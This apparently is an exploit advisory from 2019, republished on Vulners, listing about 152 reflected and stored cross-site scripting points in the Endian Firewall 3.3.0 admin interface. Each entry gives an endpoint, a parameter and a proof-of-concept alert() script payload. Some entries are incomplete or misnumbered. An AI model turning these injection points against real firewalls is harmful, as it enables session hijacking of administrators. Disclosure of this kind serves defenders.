Vulners
Lucene search
Endian Firewall Community release 3.3.0 Cross Site Scripting
`##################################################################################################################################
# Exploit Title: Endian Firewall Community release 3.3.0 | Cross-Site
Scripting
# Date: 24.01.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.endian.com
# Software Link:
https://sourceforge.net/projects/efw/files/Development/EFW-3.3.0/
# Version: 3.3.0
##################################################################################################################################
Introduction
Endian Firewall Community (EFW) is a turn-key Linux based security software
product designed for home that can transform any unused hardware appliance
into a full-featured Unified Threat Management (UTM) solution. Endian
Community is designed to make security simple and help protect home
networks by using the power of Open Source.
#################################################################################
XSS details: Reflected & Stored
#################################################################################
XSS1 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
DISPLAY_GREEN_ADDRESS
PAYLOAD
<script>alert(1)</script>
#################################################################################
XSS2 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
DISPLAY_GREEN_NETMASK
PAYLOAD
<script>alert(2)</script>
#################################################################################
XSS3 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
DISPLAY_GREEN_ADDITIONAL
PAYLOAD
<script>alert(3)</script>
#################################################################################
XSS4 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
MTU
PAYLOAD
<script>alert(4)</script>
#################################################################################
XSS5 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
MAC
PAYLOAD
<script>alert(5)</script>
#################################################################################
XSS6 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
MAIN_ADMINMAIL
PAYLOAD
<script>alert(6)</script>
#################################################################################
XSS7 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
MAIN_MAILFROM
PAYLOAD
<script>alert(7)</script>
#################################################################################
XSS8 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
MAIN_SMARTHOST
PAYLOAD
<script>alert(8)</script>
#################################################################################
XSS9 | Stored
URL
https://192.168.2.200:10443/manage/notifications/
METHOD
Post
PARAMETER
SMARTHOST_ADDRESS
PAYLOAD
"><script>alert(9)</script>
#################################################################################
XSS10 | Stored
URL
https://192.168.2.200:10443/manage/notifications/
METHOD
Post
PARAMETER
SMARTHOST_USERNAME
PAYLOAD
"><script>alert(10)</script>
#################################################################################
XSS11 | Stored
URL
https://192.168.2.200:10443/manage/password/web/?ACTION=edit&CONTROLLERNAME=&ID=2
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(11)</script>
#################################################################################
XSS12 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
new_cert_name
PAYLOAD
"><script>alert(12)</script>
#################################################################################
XSS13 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
new_cert_email
PAYLOAD
"><script>alert(13)</script>
#################################################################################
XSS14 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
new_cert_ou
PAYLOAD
"><script>alert(14)</script>
#################################################################################
XSS15 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
new_cert_city
PAYLOAD
"><script>alert(15)</script>
#################################################################################
XSS16 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
new_cert_state
PAYLOAD
"><script>alert(16)</script>
#################################################################################
XSS17 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
new_cert_days
PAYLOAD
"><script>alert(17)</script>
#################################################################################
XSS18 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
upload_cert_req_days
PAYLOAD
"><script>alert(18)</script>
#################################################################################
XSS19 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/backupschedule.cgi
METHOD
Post
PARAMETER
BACKUP_RCPTTO
PAYLOAD
"><script>alert(19)</script>
#################################################################################
XSS20 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/backupschedule.cgi
METHOD
Post
PARAMETER
BACKUP_MAILFROM
PAYLOAD
"><script>alert(20)</script>
#################################################################################
XSS21 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/backupschedule.cgi
METHOD
Post
PARAMETER
BACKUP_SMARTHOST
PAYLOAD
"><script>alert(21)</script>
#################################################################################
XSS22 | Stored
URL
https://192.168.2.200:10443/manage/dnsmasq/hosts/?ACTION=edit&CONTROLLERNAME=hosts&ID=1
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(22)</script>
#################################################################################
XSS23 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/routing.cgi
METHOD
Post
PARAMETER
source
PAYLOAD
"><script>alert(23)</script>
#################################################################################
XSS24 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/routing.cgi
METHOD
Post
PARAMETER
destination
PAYLOAD
"><script>alert(24)</script>
#################################################################################
XSS25 | Reflected
URL
METHOD
PARAMETER
PAYLOAD
"><script>alert(25)</script>
#################################################################################
XSS26 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/policy_routing.cgi
METHOD
Post
PARAMETER
source
PAYLOAD
"><script>alert(26)</script>
#################################################################################
XSS27 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/policy_routing.cgi
METHOD
Post
PARAMETER
destination
PAYLOAD
"><script>alert(27)</script>
#################################################################################
XSS28 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/policy_routing.cgi
METHOD
Post
PARAMETER
port
PAYLOAD
"><script>alert(28)</script>
#################################################################################
XSS29 | Stored
URL
https://192.168.2.200:10443/cgi-bin/uplinkeditor.cgi
METHOD
Post
PARAMETER
NAME
PAYLOAD
"><script>alert(29)</script>
#################################################################################
XSS30 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/vlanconfig.cgi
METHOD
Post
PARAMETER
DEVICE
PAYLOAD
"><script>alert(30)</script>
#################################################################################
XSS31 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
DEFAULT_LEASE_TIME_GREEN
PAYLOAD
"><script>alert(31)</script>
#################################################################################
XSS32 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
MAX_LEASE_TIME_GREEN
PAYLOAD
"><script>alert(32)</script>
#################################################################################
XSS33 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
DOMAIN_NAME_GREEN
PAYLOAD
"><script>alert(33)</script>
#################################################################################
XSS34 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
DEFAULT_LEASE_TIME_ORANGE
PAYLOAD
"><script>alert(34)</script>
#################################################################################
XSS35 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
MAX_LEASE_TIME_ORANGE
PAYLOAD
"><script>alert(35)</script>
#################################################################################
XSS36 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
DOMAIN_NAME_ORANGE
PAYLOAD
"><script>alert(36)</script>
#################################################################################
XSS37 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
DEFAULT_LEASE_TIME_BLUE
PAYLOAD
"><script>alert(37)</script>
#################################################################################
XSS38 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
MAX_LEASE_TIME_BLUE
PAYLOAD
"><script>alert(38)</script>
#################################################################################
XSS39 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
DOMAIN_NAME_BLUE
PAYLOAD
"><script>alert(39)</script>
#################################################################################
XSS40 | Reflected
URL
https://192.168.2.200:10443/manage/dhcp/fixed_leases/
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(40)</script>
#################################################################################
XSS41 | Reflected
URL
https://192.168.2.200:10443/manage/dhcp/fixed_leases/
METHOD
Post
PARAMETER
filename
PAYLOAD
"><script>alert(41)</script>
#################################################################################
XSS42 | Reflected
URL
https://192.168.2.200:10443/manage/dhcp/fixed_leases/
METHOD
Post
PARAMETER
root_path
PAYLOAD
"><script>alert(42)</script>
#################################################################################
XSS43 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/time.cgi
METHOD
Post
PARAMETER
NTP_SERVER_LIST
PAYLOAD
"><script>alert(43)</script>
#################################################################################
XSS44 | Stored
URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(44)</script>
#################################################################################
XSS45 | Stored
URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi
METHOD
Post
PARAMETER
host
PAYLOAD
"><script>alert(45)</script>
#################################################################################
XSS46 | Stored
URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi
METHOD
Post
PARAMETER
user
PAYLOAD
"><script>alert(46)</script>
#################################################################################
XSS3 | Stored
URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi
METHOD
Post
PARAMETER
ham
PAYLOAD
"><script>alert(47)</script>
#################################################################################
XSS48 | Stored
URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi
METHOD
Post
PARAMETER
spam
PAYLOAD
"><script>alert(48)</script>
#################################################################################
XSS49 | Reflected
URL
https://192.168.2.200:10443/manage/qos/devices/
METHOD
Post
PARAMETER
device
PAYLOAD
"><script>alert(49)</script>
#################################################################################
XSS50 | Reflected
URL
https://192.168.2.200:10443/manage/qos/classes/
METHOD
Post
PARAMETER
name
PAYLOAD
"><script>alert(50)</script>
#################################################################################
XSS51 | Reflected
URL
https://192.168.2.200:10443/manage/qos/rules/
METHOD
Post
PARAMETER
protocol
PAYLOAD
"><script>alert(51)</script>
#################################################################################
XSS52 | Reflected
URL
https://192.168.2.200:10443/manage/qos/rules/
METHOD
Post
PARAMETER
dscp
PAYLOAD
"><script>alert(52)</script>
#################################################################################
XSS53 | Reflected
URL
https://192.168.2.200:10443/manage/qos/rules/
METHOD
Post
PARAMETER
comment
PAYLOAD
"><script>alert(53)</script>
#################################################################################
XSS54 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/dnat.cgi
METHOD
Post
PARAMETER
target_ip_ip
PAYLOAD
"><script>alert(54)</script>
#################################################################################
XSS55 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/snat.cgi
METHOD
Post
PARAMETER
source
PAYLOAD
"><script>alert(55)</script>
#################################################################################
XSS56 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/snat.cgi
METHOD
Post
PARAMETER
snat_to_ip
PAYLOAD
"><script>alert(56)</script>
#################################################################################
XSS57 | Stored
URL
https://192.168.2.200:10443/cgi-bin/incoming.cgi
METHOD
Post
PARAMETER
destination
PAYLOAD
"><script>alert(57)</script>
#################################################################################
XSS58 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/incoming.cgi
METHOD
Post
PARAMETER
target
PAYLOAD
"><script>alert(58)</script>
#################################################################################
XSS59 | Stored
URL
https://192.168.2.200:10443/cgi-bin/incoming.cgi
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(59)</script>
#################################################################################
XSS60 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/outgoingfw.cgi
METHOD
Post
PARAMETER
target
PAYLOAD
"><script>alert(60)</script>
#################################################################################
XSS61 | Stored
URL
https://192.168.2.200:10443/cgi-bin/outgoingfw.cgi
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(61)</script>
#################################################################################
XSS62 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/zonefw.cgi
METHOD
Post
PARAMETER
target
PAYLOAD
"><script>alert(62)</script>
#################################################################################
XSS63 | Stored
URL
https://192.168.2.200:10443/cgi-bin/zonefw.cgi
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(63)</script>
#################################################################################
XSS64 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/vpnfw.cgi
METHOD
Post
PARAMETER
source
PAYLOAD
"><script>alert(64)</script>
#################################################################################
XSS65 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/vpnfw.cgi
METHOD
Post
PARAMETER
target
PAYLOAD
"><script>alert(65)</script>
#################################################################################
XSS66 | Stored
URL
https://192.168.2.200:10443/cgi-bin/vpnfw.cgi
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(66)</script>
#################################################################################
XSS67 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/xtaccess.cgi
METHOD
Post
PARAMETER
target
PAYLOAD
"><script>alert(67)</script>
#################################################################################
XSS68 | Stored
URL
https://192.168.2.200:10443/cgi-bin/xtaccess.cgi
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(68)</script>
#################################################################################
XSS69 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
PROXY_PORT
PAYLOAD
"><script>alert(69)</script>
#################################################################################
XSS70 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
VISIBLE_HOSTNAME
PAYLOAD
"><script>alert(70)</script>
#################################################################################
XSS71 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
ADMIN_MAIL_ADDRESS
PAYLOAD
"><script>alert(71)</script>
#################################################################################
XSS72 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
BYPASS_SOURCE
PAYLOAD
"><script>alert(72)</script>
#################################################################################
XSS73 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
BYPASS_DESTINATION
PAYLOAD
"><script>alert(73)</script>
#################################################################################
XSS74 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
CACHE_SIZE
PAYLOAD
"><script>alert(74)</script>
#################################################################################
XSS75 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
CACHE_MEM
PAYLOAD
"><script>alert(75)</script>
#################################################################################
XSS76 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
MAX_SIZE
PAYLOAD
"><script>alert(76)</script>
#################################################################################
XSS77 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
DST_NOCACHE
PAYLOAD
"><script>alert(77)</script>
#################################################################################
XSS78 | Stored
URL
https://192.168.2.200:10443/cgi-bin/proxypolicy.cgi
METHOD
Post
PARAMETER
filtertype
PAYLOAD
"><script>alert(78)</script>
#################################################################################
XSS79 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi
METHOD
Post
PARAMETER
AUTH_CHILDREN
PAYLOAD
"><script>alert(79)</script>
#################################################################################
XSS80 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi
METHOD
Post
PARAMETER
AUTH_MAX_USERIP
PAYLOAD
"><script>alert(80)</script>
#################################################################################
XSS81 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi
METHOD
Post
PARAMETER
AUTH_CACHE_TTL
PAYLOAD
"><script>alert(81)</script>
#################################################################################
XSS82 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi
METHOD
Post
PARAMETER
AUTH_IPCACHE_TTL
PAYLOAD
"><script>alert(82)</script>
#################################################################################
XSS83 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi
METHOD
Post
PARAMETER
NCSA_MIN_PASS_LEN
PAYLOAD
"><script>alert(83)</script>
#################################################################################
XSS84 | Reflected
URL
https://192.168.2.200:10443/manage/proxy/adjoin/
METHOD
Post
PARAMETER
ADMIN_USER
PAYLOAD
"><script>alert(84)</script>
#################################################################################
XSS85 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/frox.cgi
METHOD
Post
PARAMETER
TRANSPARENT_SOURCE_BYPASS
PAYLOAD
"><script>alert(85)</script>
#################################################################################
XSS86 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/frox.cgi
METHOD
Post
PARAMETER
TRANSPARENT_DESTINATION_BYPASS
PAYLOAD
"><script>alert(86)</script>
#################################################################################
XSS87 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi
METHOD
Post
PARAMETER
VIRUS_ADMIN
PAYLOAD
"><script>alert(87)</script>
#################################################################################
XSS88 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi
METHOD
Post
PARAMETER
NOTIFICATION_SENDER
PAYLOAD
"><script>alert(88)</script>
#################################################################################
XSS89 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi
METHOD
Post
PARAMETER
BYPASS_SOURCE
PAYLOAD
"><script>alert(89)</script>
#################################################################################
XSS90 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi
METHOD
Post
PARAMETER
BYPASS_DESTINATION
PAYLOAD
"><script>alert(90)</script>
#################################################################################
XSS91 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
SENDER_WHITELIST
PAYLOAD
"><script>alert(91)</script>
#################################################################################
XSS92 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
RECIPIENT_WHITELIST
PAYLOAD
"><script>alert(92)</script>
#################################################################################
XSS93 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
CLIENT_WHITELIST
PAYLOAD
"><script>alert(93)</script>
#################################################################################
XSS94 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
SENDER_BLACKLIST
PAYLOAD
"><script>alert(94)</script>
#################################################################################
XSS95 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
RECIPIENT_BLACKLIST
PAYLOAD
"><script>alert(95)</script>
#################################################################################
XSS96 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
CLIENT_BLACKLIST
PAYLOAD
"><script>alert(96)</script>
#################################################################################
XSS97 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
WHITELIST_RECIPIENT
PAYLOAD
"><script>alert(97)</script>
#################################################################################
XSS98 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
WHITELIST_CLIENT
PAYLOAD
"><script>alert(98)</script>
#################################################################################
XSS99 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
SPAM_WHITELIST
PAYLOAD
"><script>alert(99)</script>
#################################################################################
XSS100 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
SPAM_BLACKLIST
PAYLOAD
"><script>alert(100)</script>
#################################################################################
XSS101 | Stored
URL
https://192.168.2.200:10443/cgi-bin/smtpdomains.cgi
METHOD
Post
PARAMETER
DOMAIN
PAYLOAD
"><script>alert(101)</script>
#################################################################################
XSS102 | Stored
URL
https://192.168.2.200:10443/cgi-bin/smtpdomains.cgi
METHOD
Post
PARAMETER
SERVER
PAYLOAD
"><script>alert(102)</script>
#################################################################################
XSS103 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/domainrouting/
METHOD
Post
PARAMETER
domain
PAYLOAD
"><script>alert(103)</script>
#################################################################################
XSS104 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/domainrouting/
METHOD
Post
PARAMETER
smarthost_address
PAYLOAD
"><script>alert(104)</script>
#################################################################################
XSS105 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/domainrouting/
METHOD
Post
PARAMETER
smarthost_username
PAYLOAD
"><script>alert(105)</script>
#################################################################################
XSS106 | Stored
URL
https://192.168.2.200:10443/cgi-bin/smtprouting.cgi
METHOD
Post
PARAMETER
ADDRESS
PAYLOAD
"><script>alert(106)</script>
#################################################################################
XSS107 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtprouting.cgi
METHOD
Post
PARAMETER
BCC
PAYLOAD
"><script>alert(107)</script>
#################################################################################
XSS108 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
SMARTHOST_USERNAME
PAYLOAD
"><script>alert(108)</script>
#################################################################################
XSS109 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
AUTH_DAEMONS
PAYLOAD
"><script>alert(109)</script>
#################################################################################
XSS110 | Stored
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
IMAP_AUTH_SERVER
PAYLOAD
#################################################################################
XSS111 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
SMTP_HELO_NAME
PAYLOAD
"><script>alert(111)</script>
#################################################################################
XSS112 | Stored
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
ALWAYS_BCC_ADDRESS
PAYLOAD
"><script>alert(112)</script>
#################################################################################
XSS113 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
MAILTEMPLATE_LANGUAGE
PAYLOAD
"><script>alert(113)</script>
#################################################################################
XSS114 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
SMTPD_HARD_ERROR_LIMIT
PAYLOAD
"><script>alert(114)</script>
#################################################################################
XSS115 | Reflected
URL
https://192.168.2.200:10443/manage/dnsmasq/localdomains/
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(115)</script>
#################################################################################
XSS116 | Reflected
URL
https://192.168.2.200:10443/manage/openvpn/
METHOD
Post
PARAMETER
reneg_sec
PAYLOAD
"><script>alert(116)</script>
#################################################################################
XSS55 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(117)</script>
#################################################################################
XSS118 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
secret
PAYLOAD
"><script>alert(118)</script>
#################################################################################
XSS119 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_name
PAYLOAD
"><script>alert(119)</script>
#################################################################################
XSS120 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_email
PAYLOAD
"><script>alert(120)</script>
#################################################################################
XSS121 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_ou
PAYLOAD
"><script>alert(121)</script>
#################################################################################
XSS122 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_organization
PAYLOAD
"><script>alert(122)</script>
#################################################################################
XSS123 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_city
PAYLOAD
"><script>alert(123)</script>
#################################################################################
XSS124 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_state
PAYLOAD
"><script>alert(124)</script>
#################################################################################
XSS125 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_days
PAYLOAD
"><script>alert(125)</script>
#################################################################################
XSS126 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
upload_cert_req_days
PAYLOAD
"><script>alert(126)</script>
#################################################################################
XSS127 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
local_peerid
PAYLOAD
"><script>alert(127)</script>
#################################################################################
XSS128 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
remote_peerid
PAYLOAD
"><script>alert(128)</script>
#################################################################################
XSS129 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
name
PAYLOAD
"><script>alert(129)</script>
#################################################################################
XSS130 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(130)</script>
#################################################################################
XSS131 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
new_cert_days
PAYLOAD
"><script>alert(131)</script>
#################################################################################
XSS132 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
upload_cert_req_days
PAYLOAD
"><script>alert(132)</script>
#################################################################################
XSS133 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
user_department
PAYLOAD
"><script>alert(133)</script>
#################################################################################
XSS134 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
user_organization
PAYLOAD
"><script>alert(134)</script>
#################################################################################
XSS135 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
user_city
PAYLOAD
"><script>alert(135)</script>
#################################################################################
XSS136 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
user_state
PAYLOAD
"><script>alert(136)</script>
#################################################################################
XSS137 | Reflected
URL
https://192.168.2.200:10443/manage/ca/certificate/
METHOD
Post
PARAMETER
new_cert_name
PAYLOAD
"><script>alert(137)</script>
#################################################################################
XSS138 | Reflected
URL
https://192.168.2.200:10443/manage/ca/certificate/
METHOD
Post
PARAMETER
new_cert_ou
PAYLOAD
"><script>alert(138)</script>
#################################################################################
XSS139 | Reflected
URL
https://192.168.2.200:10443/manage/ca/certificate/
METHOD
Post
PARAMETER
new_cert_organization
PAYLOAD
"><script>alert(139)</script>
#################################################################################
XSS140 | Reflected
URL
https://192.168.2.200:10443/manage/ca/certificate/
METHOD
Post
PARAMETER
new_cert_city
PAYLOAD
"><script>alert(140)</script>
#################################################################################
XSS141 | Reflected
URL
https://192.168.2.200:10443/manage/ca/certificate/
METHOD
Post
PARAMETER
new_cert_state
PAYLOAD
"><script>alert(141)</script>
#################################################################################
XSS142 | Reflected
URL
https://192.168.2.200:10443/manage/ca/certificate/
METHOD
Post
PARAMETER
upload_cert_req_days
PAYLOAD
"><script>alert(142)</script>
#################################################################################
XSS143 | Stored
URL
https://192.168.2.200:10443/cgi-bin/logs_log.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
"><script>alert(143)</script>
#################################################################################
XSS144 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_log.cgi
METHOD
Post
PARAMETER
OFFSET
PAYLOAD
"><script>alert(144)</script>
#################################################################################
XSS145 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_ids.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
"><script>alert(145)</script>
#################################################################################
XSS146 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_openvpn.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
"><script>alert(146)</script>
#################################################################################
XSS147 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_clamav.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
"><script>alert(147)</script>
#################################################################################
XSS148 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_firewall.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
"><script>alert(148)</script>
#################################################################################
XSS149 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_firewall.cgi
METHOD
Post
PARAMETER
OFFSET
PAYLOAD
"><script>alert(148)</script>
#################################################################################
XSS149 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_proxy.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
"><script>alert(149)</script>
#################################################################################
XSS150 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_smtp.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
"><script>alert(150)</script>
#################################################################################
XSS151 | Stored
URL
https://192.168.2.200:10443/manage/opentsa/
METHOD
Post
PARAMETER
HTTP_USERNAME
PAYLOAD
"><script>alert(151)</script>
#################################################################################
XSS152 | Stored
URL
https://192.168.2.200:10443/manage/opentsa/
METHOD
Post
PARAMETER
HTTP_PASSWORD
PAYLOAD
"><script>alert(152)</script>
#################################################################################
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jan 2019 00:00Current
0.2Low risk
Vulners AI Score0.2